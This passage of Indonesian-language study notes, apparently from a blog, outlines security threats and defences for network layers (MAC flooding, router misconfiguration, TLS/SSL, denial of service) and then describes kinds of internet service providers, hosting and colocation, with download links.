  • Mac Flooding  : Perangkat malicious terhubung dengan switch, dan mengirimkan banyak data sekaligus dan menyebabkan switch penuh, dan akhirnya switch menolak semua data, koneksi ini berarti switch berfungsi seperti hub
Bagaimana cara mengamankan dari serangan Mac Flooding? Penanganannya Switch diatur agar bisa membatasi user hanya bisa mengirimkan berapa banyak data dalam satu waktu. Nanti gue bakalan praktekin gimana caranya, InsyaAllah…..

NETWORK

Pada bagian ini, keamanan lebih difokuskan pada IP dan Port, karena setiap data yang melewati layer ini mengandung IP dan Port yang  digunakan oleh pengirim serta alamat IP dan Port dari tujuan paket tersebut. Perangkat pada layer ini adalah Router
Serangan yang mungkin terjadi:
  • Denial of Service threat.
  • Attacker dapat melakukan konfigurasi ulang pada Router dan mengubah konfigurasinya
  • Attacker merusak tabel routing dan mengirim update yang salah
Langkah penanganan:
  • Menggunakan firewall
  • Menggunakan password yang unik, menghindari password berupa nama, nomor telepon, tanggal, dan kata-kata yang mungkin mudah ditebak menggunakan metode Bruteforce. 
  • Kombinasi huruf, angka dan simbol pada password. Contoh passwod: b3L4j4RC1SC0!
  • Rutin mengganti password, setidaknya satu bulan sekali atau seminggu sekali

TRANSPORT

Pada bagian ini kita harus mengamankan informasi data yang dikirim setiap user. Contoh kasus adalah saat kita akan bertransaksi online dengan menyertakan kartu kredit, jika tidak ada enkripsi, Attacker dapat mendapatkan informasi kartu kredit dengan mudah.
Saya akan membahas TLS (Transport Layer Security) dan SSL (Secure Socket Layer) :
  • TLS : Beroperasi diatas lapisan TCP, dan menggunakan API (Application Popular Interface) untuk TCP. TLS berada di antara Aplikasi dan Transport, protokol Transport bertindak sebagai lapisan TCP dan ditingkatkan keamanannya
  • SSL : Digunakan hampir semua transaksi online menggunakan ini, karena menjamin kerahasian, karena menggunakan kriptografi yang cukup rumit

SESSION

Pada layer ini tugasnya adalah:
  • Mengkoordinasi jalannya komunikasi antar sistem
  • Melakukan proses pembentukan, pengelolaan dan pemutusan session antar system aplikasi
  • Mengendalikan dialog antar device atau nodes
Ancaman pada layer ini adalah Denial Of Services

APPLICATION

Menggunakan SSL

Bisa mendownload link tersebut ; https://fileku.co/CPZ6EF

04.Teknik penyediaan layanan jaringan

Penyedia layanan internet atau Internet service providers (ISP) memiliki tugas memberikan layanan dan konten yang berkaitan dengan internet.

Jenis Penyedia Layanan Internet

Jenis penyedia layanan Internet berikut dapat dibedakan berdasarkan tugas dan layanan mereka:

Penyediaan Koneksi Internet

Istilah “penyedia layanan Internet” digunakan khususnya untuk perusahaan yang menghubungkan pengguna akhir ke Internet. Paket IP yang berbasis web dikirimkan melalui layanan mereka.
Berbagai jenis koneksi bisa digunakan untuk tujuan ini. Selain jalur dial-up konvensional, koneksi internet juga bisa dibuat, misalnya melalui teknologi radio, kabel serat optik, koneksi broadband, dan jalur khusus. Bergantung pada ukuran jaringan yang disediakan penyedia layanan Internet tertentu, mereka dibedakan sebagai ISP tingkat 2, tier 2, dan tier 3. Penyedia lokal yang kecil dan lokal diklasifikasikan sebagai tier 3. Tier 2 menunjukkan jaringan supra-regional ISP yang sangat penting. Tingkat 1, di sisi lain, mengacu pada penyedia yang dianggap sebagai tulang punggung Internet yang memiliki kepentingan global.

Hosting

Hosting adalah tentang penyediaan data atas nama orang lain. Jenis berikut bisa dibedakan:
  • Domain hosting: Penyedia mengurus pendaftaran domain serta operasinya.
  • Webhosting: Data situs pelanggan dihosting di server web penyedia, dengan kata lain, disimpan. Pelanggan dapat mengakses sumber daya mereka dan sering menggunakan fitur tambahan, seperti bahasa scripting atau database tertentu. Layanan tambahan meliputi backup data reguler, ketersediaan konstan atau penyediaan CMS.
  • Mail hosting: ISP menyediakan server surat di servernya sendiri dan juga layanan email lainnya.
  • Server hosting: ISP mengoperasikan beberapa server di pusat data dan menyediakan ruang penyimpanan kepada pelanggannya. Tidak seperti dedicated server, yang sepenuhnya didedikasikan untuk hanya satu pelanggan, server virtual ditawarkan dengan membagi server fisik ke dalam banyak unit kecil dan menyewakannya ke pelanggan yang berbeda. Mereka berbagi kinerja server, namun membayar lebih sedikit sebagai imbalannya. Saat memilih server hosting, perhatian khusus harus diberikan pada layanan tambahan seperti support cepat dan ketersediaan tinggi.

Penyedia Layanan Aplikasi

Penyedia layanan aplikasi memberikan aplikasi kepada pelanggan mereka. Perangkat lunak berbasis web (Software as a Service) menjadi semakin penting pada saat koneksi Internet yang selalu tersedia. Dengan demikian, jumlah penyedia layanan terus meningkat. Jika Anda ingin memanfaatkan produk perangkat lunak semacam itu, dua pertanyaan mendasar harus selalu dipertimbangkan. Penanganan data yang aman dan rahasia yang diunggah ke awan harus dipastikan (kata kunci: privasi) dan Anda perlu memikirkan alternatif yang mungkin, jika layanan menjadi tidak tersedia atau benar-benar dimatikan.

Penyedia konten

Penyedia konten menyediakan konten editorial atau menawarkan sistem pengelolaan konten kepada pelanggan mereka untuk disewa. Pelanggan hanya bisa menggunakan informasi atau sistem sampai dia mengakhiri kontraknya dengan penyedia konten.

Housing

Housing (juga: colocation) menyangkut khususnya lokasi server. Operator pusat data memberi pelanggan mereka pilihan untuk mengakomodasi server mereka sendiri. Di satu sisi, layanan provider terdiri dari menawarkan lokasi masing-masing, biasanya di rak server, namun di sisi lain juga dilengkapi dengan keamanan terhadap pihak ketiga yang tidak berwenang, koneksi internet, serta catu daya tak terputus dan memadai. pendinginan

Relevansi dengan Optimasi Search Engine

Pilihan penyedia layanan Internet tidak bisa secara langsung mempengaruhi rangking sebuah website. Namun, ISP menyediakan kondisi kerangka kerja yang bisa berdampak tidak langsung. Web hosting di server virtual dapat mengakibatkan kinerja situs web dan toko online yang buruk.
Hal ini terjadi bilamana tingkat yang dipilih terlalu rendah dan beban puncak tidak dapat ditutupi. Hal ini dapat berdampak negatif pada rangking dan, setidaknya dalam kasus toko online, konversi dan penjualan. Selain itu, terutama dalam hal tarif yang lebih rendah, host dapat mengecualikan pelanggan untuk melakukan tindakan tertentu, misalnya file htaccess. Ini akan membatasi pengoptimalan mesin telusur dalam pekerjaan sehari-hari mereka.
Bisa mendownload link tersebut; https://fileku.co/RWc5pX